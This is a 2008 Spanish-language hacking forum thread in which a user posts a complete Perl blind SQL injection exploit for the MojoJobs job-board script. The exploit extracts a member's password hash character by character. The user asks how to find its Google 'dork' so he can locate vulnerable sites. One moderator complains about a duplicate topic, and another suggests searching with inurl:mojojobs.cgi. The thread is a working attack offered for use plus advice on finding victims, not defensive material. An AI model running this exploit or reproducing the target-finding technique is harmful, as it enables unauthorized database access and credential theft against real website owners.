Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Diciembre 04, 2008, 07:43:57
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNSeCure)  |  Tema: como encontral el dork de un exploit en perl? 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: como encontral el dork de un exploit en perl?  (Leído 154 veces)
erv-Z
Recien Llegado
*
Desconectado Desconectado

Mensajes: 3


Ver Perfil
« en: Julio 25, 2008, 10:28:04 »
juegos gratis
Bueno amigo tengo una duda con un exploit en perl quiero saber su dork para poder buscar una pajina vurnerable a ese exploit este es el exploit.

Código:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
  print "                                                                \n";
  print "   #################### Viva IslaMe Viva IslaMe ################\n";
  print "   #   MojoJobs Blind SQL Injection Exploit             #\n";
  print "   #                                (mojoJobs.cgi mojo ) #\n";
  print "   #   Author: Mr.SQL                                          #\n";
  print "   #   EMAIL : SQL @HOTMAIL.IT                                  #\n";
  print "   #                                                           #\n";
  print "   #                -((:: GrE3E3E3E3E3ETZ ::))-                #\n";
  print "   #                                                           #\n";
  print "   #   HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab  #\n";
  print "   #                :: ALwHeD :: milw0rm ::                    #\n";
  print "   #                                                           #\n";
  print "   #              <<>>   MuSliMs HaCkErS   <<>>                #\n";
  print "   #                                                           #\n";
  print "   #   HOME:    WwW.PaL-HaCkEr.CoM                             #\n";
  print "   #                                                           #\n";
  print "   #   Usage  : perl test.pl host                              #\n";
  print "   #   Example: perl test.pl www.host.com / -d 10              #\n";
  print "   #   Options:                                                #\n";
  print "   #     -d    valid cat_a  value                              #\n";
  print "   #############################################################\n";
  exit;
}
my $host     = $ARGV[0];
my $cat_a      = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
print "[~] Exploiting...\n";
if($options{"b"})
{
  $mojo = $options{"b"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $cat_a, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $cat_a, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}
print "\n[~] Exploiting done\n";
sub istrue2
{
  my $host    = shift;
  my $cat_a     = shift;
  my $i       = shift;
  my $h       = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host."mojoJobs.cgi?mojo=1&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp    = $ua->get($query);
  my $content = $resp->content;
  my $regexp  = "tourterms.pdf";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }
}

# milw0rm.com [2008-07-21]

jejeje nececito su dork y tanbien que me expliquen como saber su dork.

Nota: de esta pajina saque el exploit.


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
En línea
nexus 1
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 4083


La mejor manera de aprender es enseñando


Ver Perfil WWW
« Respuesta #1 en: Julio 26, 2008, 01:51:56 »
no dupliques temas ... ya tienes 1 igual x aca
 
>
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

SAlu2 ---
En línea
Gracias a los amigos del Foro.Sois lo mejor



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Normas Del Foro

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
   
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2151


http://foro.undersecurity.net


Ver Perfil WWW
« Respuesta #2 en: Julio 27, 2008, 08:35:05 »
google no muerde
xD¡

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
o en inurl:y poner mojojobs.cgi

saludos¡
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNSeCure)  |  Tema: como encontral el dork de un exploit en perl? « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC